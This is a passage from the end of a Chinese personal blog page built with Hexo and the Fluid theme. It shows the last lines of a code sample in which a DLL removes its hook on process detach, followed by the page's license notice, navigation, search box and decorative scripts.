class="hljs-keyword">if</span> (reason == DLL_PROCESS_DETACH)<br>	&#123;<br>		<span class="hljs-built_in">UnInstallHook</span>();<br>	&#125;<br>&#125;<br></code></pre></td></tr></table></figure>


            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/01/23/CSAPP%E7%AC%94%E8%AE%B0/">
                        <span class="hidden-mobile"></span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
<!-- 数字雨 -->
  <canvas id="canvas" width="1440" height="900" ></canvas>
  <script type="text/javascript" src="/js/DigitalRain.js"></script>

<script type="text/javascript" src="http://libs.baidu.com/jquery/1.8.3/jquery.js"></script>
<script type="text/javascript" src="http://libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>

<!-- 雪花特效 -->
<script type="text/javascript" src="\js\snow.js"></script>

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/love.js"></script>